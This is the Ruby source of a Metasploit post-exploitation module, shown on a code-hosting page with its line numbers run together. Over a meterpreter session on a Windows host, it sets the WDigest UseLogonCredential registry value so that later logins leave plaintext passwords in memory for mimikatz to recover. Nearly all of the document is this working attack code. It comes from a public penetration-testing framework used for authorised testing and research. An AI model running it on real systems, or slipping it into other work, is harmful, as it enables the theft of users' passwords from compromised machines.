Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/manage/wdigest_caching.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Registry7include Msf::Post::Windows::Version89WDIGEST_REG_LOCATION = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'.freeze10USE_LOGON_CREDENTIAL = 'UseLogonCredential'.freeze1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Windows Post Manage WDigest Credential Caching',17'Description' => %q{18On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables19credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key.20Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.21},22'License' => MSF_LICENSE,23'Author' => [ 'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>'],24'Platform' => [ 'win' ],25'SessionTypes' => [ 'meterpreter' ]26)27)2829register_options(30[31OptBool.new('ENABLE', [false, 'Enable the WDigest Credential Cache.', true])32]33)34end3536# Run Method for when run command is issued37def run38print_status("Running module against #{sysinfo['Computer']}")39# Check if OS is 8/2012 or newer. If not, no need to set the registry key40# Can be backported to Windows 7, 2k8R2 but defaults to enabled...41version = get_version_info42if version.build_number < Msf::WindowsVersion::Win7_SP043print_status('Older Windows version detected. No need to enable the WDigest Security Provider. Exiting...')44else45datastore['ENABLE'] ? wdigest_enable : wdigest_disable46end47end4849def get_key50# Check if the key exists. Not present by default51print_status("Checking if the #{WDIGEST_REG_LOCATION}\\#{USE_LOGON_CREDENTIAL} DWORD exists...")52begin53wdvalue = registry_getvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL)54key_exists = !wdvalue.nil?5556print_status("#{USE_LOGON_CREDENTIAL} is set to #{wdvalue}") if key_exists57return wdvalue58rescue Rex::Post::Meterpreter::RequestError => e59fail_with(Failure::Unknown, "Unable to access registry key: #{e}")60end61end6263def wdigest_enable64wdvalue = get_key65key_exists = !wdvalue.nil?66# If it is not present, create it67if key_exists && wdvalue == 168print_good('Registry value is already set. WDigest Security Provider is enabled')69else70begin71verb = key_exists ? 'Setting' : 'Creating'72print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 1...")73if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 1, 'REG_DWORD')74print_good('WDigest Security Provider enabled')75else76print_error('Unable to access registry key - insufficient privileges?')77end78rescue Rex::Post::Meterpreter::RequestError => e79fail_with(Failure::Unknown, "Unable to access registry key: #{e}")80end81end82end8384def wdigest_disable85wdvalue = get_key86key_exists = !wdvalue.nil?87# If it is not present, create it88if key_exists && wdvalue == 089print_good('Registry value is already set. WDigest Security Provider is disabled')90else91begin92verb = key_exists ? 'Setting' : 'Creating'93print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 0...")94if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 0, 'REG_DWORD')95print_good('WDigest Security Provider disabled')96else97print_error('Unable to access registry key - insufficient privileges?')98end99rescue Rex::Post::Meterpreter::RequestError => e100fail_with(Failure::Unknown, "Unable to access registry key: #{e}")101end102end103end104end105106107